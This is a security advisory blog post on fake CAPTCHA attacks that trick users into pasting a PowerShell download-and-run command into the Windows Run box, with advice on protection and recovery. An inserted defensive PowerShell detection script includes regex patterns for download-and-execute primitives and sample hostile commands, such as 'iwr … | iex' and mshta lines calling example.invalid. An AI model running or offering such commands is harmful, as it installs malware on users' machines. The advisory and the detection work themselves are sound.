Hackers Are Using CAPTCHA as Attack Vector

2025-03-14

For the information of our readership, Whiteblueocean is today issuing a warning on the dangers of malicious CAPTCHA requests found on websites and potentially in applications. Security researchers worldwide have observed malicious CAPTCHAs being used as a means of installing stealers onto victims' computers, harvesting valuable data including emails, passwords, addresses and financial information. The attacks being conducted include watering hole attacks, ad abuse and SEO poisoning.

Malicious CAPTCHAs are being used in a variety of malware campaigns, usually designed to target specific demographics. For example, PDF files ostensibly containing instructions for using or installing cheats in video games are being distributed to gamers by SEO or algorithm poisoning. This technique allows for the malware to spread through Google and other search engines, through YouTube video descriptions and TikTok captions, and via online PDF libraries. These CAPTCHAs have also appeared on real, legitimate websites after compromise by a bad actor in what is known as a watering hole attack.

How the Attack Works

This attack vector can be encountered at any point while innocently browsing the internet, such as through embedded adverts, malicious search engine results, social media, watering hole attacks and phishing attempts. Through SEO poisoning, web users may come across this attack via search engines such as Google, Bing and Yahoo. Search results may point to a PDF file hosted on a legitimate service such as WebFlow, or to one indexed by an online PDF library. Alternatively, in various watering hole attacks, legitimate websites have been compromised to display the malicious CAPTCHA as a prompt overlaid on their ordinary content.

What is a CAPTCHA?

Per Carnegie Mellon University, a CAPTCHA (short for "Completely Automated Public Turing Test To Tell Computers and Humans Apart") is a type of challenge–response test used in computing to determine whether the user is human, in order to deter bot attacks and spam.

The CAPTCHA displayed is visually very similar to those used on many other websites, but it gives instructions that may catch some people off guard. The first thing presented to the end user is a check box, with instructions to click it in order to progress the verification process. This is common practice and will not initially raise suspicion; however, once the check box is ticked, the CAPTCHA moves on to additional instructions that are atypical for this type of human verification:

Figure 1: Example of CAPTCHA embedded into website that was compromised in a watering hole attack, taken from the University of Michigan and edited for visibility.

The instructions may immediately ring alarm bells for many of our readers, who will recognise this as a non-standard and dangerous way to implement a CAPTCHA check. This technique has nevertheless been effective in infecting countless devices. When a victim interacts with the UI of the CAPTCHA window, a string containing a dangerous PowerShell command is silently copied to their clipboard. PowerShell is a powerful scripting language that is primarily used on Windows but can also be executed on macOS and Linux. When the copied command is executed, it instructs the user's device to download a payload from a remote host. The payload is reported to be delivered in the form of a malicious PNG image. This is done because image file formats are not commonly scanned for malicious code by antivirus solutions, making them an easy way to obfuscate malware. The same applies to other image, audio and video formats.

Figure 2: Example of the Run window interface opened using Win + R where PowerShell and other scripting languages can be used.

The "Run" window, opened using Win + R on Windows devices, has only a small text box. Unwitting users who paste their clipboard into it may still be unaware of the contents of the string, as only the end of the string is visible to them. The end of this string may state some innocuous phrase such as "I am not a robot", formatted as a comment so as not to invalidate the rest of the code, but to the left of this, and initially out of view, is a command to download and execute malware from a remote host.
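One way a defender can check a Windows machine for exactly this pattern, as an added example that is not part of the original article: a PowerShell script that reads the Run dialog history Windows keeps under HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU and scores each entry on the traits described above (a script host, a download-and-execute primitive, a remote URL, and a decoy comment at the very end). The scoring heuristic, the function names and the sample strings (which use the reserved example.invalid host) are assumptions constructed for illustration, not indicators from the article.

```powershell
# Added example, not from the original article. Flags Run-dialog history
# entries that look like a fake-CAPTCHA paste: a command that hides its
# real purpose behind a trailing "I am not a robot"-style comment.

function Test-SuspiciousRunCommand {
    param([Parameter(Mandatory)][string]$Command)

    $reasons = @()

    # Script hosts and download utilities a legitimate CAPTCHA never needs.
    if ($Command -match '(?i)\b(powershell|pwsh|mshta|cmd|wscript|cscript|rundll32|curl|certutil)\b') {
        $reasons += 'script host or download utility'
    }
    # Download-and-run primitives commonly chained in a single line.
    if ($Command -match '(?i)\b(iwr|irm|iex|Invoke-WebRequest|Invoke-RestMethod|Invoke-Expression|DownloadString|DownloadFile|Start-Process)\b') {
        $reasons += 'download/execute primitive'
    }
    # Flags that keep the console window out of sight or bypass policy.
    if ($Command -match '(?i)-w(indowstyle)?\s+hidden|-nop\b|-ep\s+bypass|-ExecutionPolicy\s+Bypass') {
        $reasons += 'hidden window or policy bypass flag'
    }
    # A remote host to pull the payload from.
    if ($Command -match '(?i)https?://') {
        $reasons += 'remote URL'
    }
    # The tell-tale decoy: a comment at the end so the Run box shows only
    # reassuring text such as "I am not a robot" or "Verification ID".
    if ($Command -match '(?i)#\s*[^#]*(robot|human|verif|captcha)[^#]*$') {
        $reasons += 'trailing decoy comment'
    }

    [pscustomobject]@{
        Command    = $Command
        Suspicious = ($reasons.Count -ge 2)   # heuristic threshold (assumption)
        Reasons    = ($reasons -join '; ')
    }
}

function Get-RunMruHistory {
    # Windows stores Win+R history here; each value "a", "b", ... is "<command>\1".
    $key = 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU'
    if (-not (Test-Path $key)) { return @() }
    $item = Get-ItemProperty -Path $key
    $item.PSObject.Properties |
        Where-Object { $_.Name -match '^[a-z]$' } |
        ForEach-Object { $_.Value -replace '\\1$', '' }
}

# Constructed sample entries (not real indicators) so the check runs anywhere.
$sample = @(
    'notepad',
    'calc',
    'powershell -w hidden -c "iwr http://example.invalid/p.png | iex" # I am not a robot',
    'mshta http://example.invalid/verify # Verification ID: 1234'
)

# Real history from this machine first, then the constructed samples.
$entries = @(Get-RunMruHistory) + $sample
$entries |
    ForEach-Object { Test-SuspiciousRunCommand $_ } |
    Where-Object Suspicious |
    Format-Table -AutoSize
```

Run it in a normal (non-elevated) PowerShell session as the user who may have pasted the string; RunMRU is per-user, so each profile on a shared machine needs its own check. The two constructed samples are reported with at least three reasons each, while "notepad" and "calc" are not reported. A hit is a reason to treat the machine as compromised and move to the remediation steps later in this article, not proof on its own, since the history only shows what was typed, not whether the payload actually ran.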


Figure 3: An example of a malicious string copied to the clipboard which will download malware once executed from the Run window. In this instance, the script downloads a copy of the Lumma stealer formatted as an .m4a file, an audio file format; however, the actual contents of this file will not function as audio and will instead be used to execute more malicious code on the victim's device. Screenshot taken from Netskope's Threat Lab. (Taken 06/03/2025)

Reportedly, similar techniques exist where the CAPTCHA is embedded in PDF files downloaded from the internet, such as through Google or through PDF libraries. These PDFs have also been distributed by email, though PC users may not so readily believe a CAPTCHA check displayed in a local file. Modern browsers, where users are far more accustomed to seeing a CAPTCHA check, are able to display PDF files seamlessly after downloading them, and many PDF libraries have an integrated viewing interface. CAPTCHAs displayed within the browser window are much more likely to fool the end user into following the instructions.

The end result depends greatly on the type of malware being installed. Victims report receiving alerts after their computer automatically blocks some network connections, and seeing their browsers rolled back to unofficial versions that are compatible with the malware being installed. Whiteblueocean has acquired evidence of the output of these stealers, including full reports of the victim's cookie sessions, saved usernames, emails, passwords, address and financial details, as well as access to browser plugin-based crypto wallets.

Protecting Yourself

Although this kind of attack may seem simple to avoid, we are all vulnerable to human error. You may be tired, your guard may be down, and you may not be expecting to be hit by a virus at that moment in time. Anybody can fall victim to these attacks, simple as they may seem. Here are a few key takeaways to protect yourself from a CAPTCHA-based attack.

  • A legitimate CAPTCHA will never ask you to use the Run window for any purpose.
  • If you see a CAPTCHA check on a website or application where you don't expect it, double check - even legitimate websites can be compromised by hackers.
  • Use a secure password manager and employ Multi-Factor Authentication (MFA) to manage and protect your passwords.
  • Practice good cyber hygiene and exercise vigilance when browsing the internet.

"I ran a command in Run program window and my computer was hacked, what do I do?"

Calm yourself down and move ahead with standard remediation strategies in order of priority. If you believe your financial information may have been accessed, consider freezing your cards and online banking. Your online accounts may also have been compromised, and you should bear in mind that activity on your PC may be monitored. Therefore, on a separate device if possible, change your passwords, prioritising financial accounts and email providers.

If you find that your accounts have been taken over and the credentials changed, you will need to contact that website or application's support team to have the change reversed.

You can ensure the safety of your computer by backing up important files either via the cloud or by physical drive and installing a clean instance of your operating system. Make sure any files that you back up are scanned to ensure that the malware is not embedding itself within other files on your device. Beware that new OS partitions can still be reinfected by old ones remaining on the device.

Conclusion

CAPTCHA attacks are successful due to many victims being ill-informed on today's threat landscape, and due to human error. We hope that this article has shed light on this new vector of cyber attack and that this knowledge helps protect you from such attacks in the future. However, we must also reiterate the importance of your own vigilance. Whether it's CAPTCHA or some other technology, it is easy to become comfortable and forget to do the usual checks for safety and legitimacy, and this is how such simple attacks continue to be so successful. So in conclusion, resist the urge to let your guard down even when faced with the fuss of a CAPTCHA check. Follow best practices, stay informed, and your device and your data will be much, much safer as a result.

Sources

https://www.whiteblueocean.com/glossary/

https://www.hdblog.it/sicurezza/articoli/n603265/captcha-attacco-hacker-pc-windows-come-funziona/

https://thehackernews.com/2025/02/5000-phishing-pdfs-on-260-domains.html?_m=3n.009a.3605.io0ao44blc.2mm0

https://www.cylab.cmu.edu/partners/success-stories/recaptcha.html

https://safecomputing.umich.edu/security-alerts/fake-captcha-initiates-malware

https://www.netskope.com/blog/fake-captchas-malicious-pdfs-seo-traps-leveraged-for-user-manual-searches
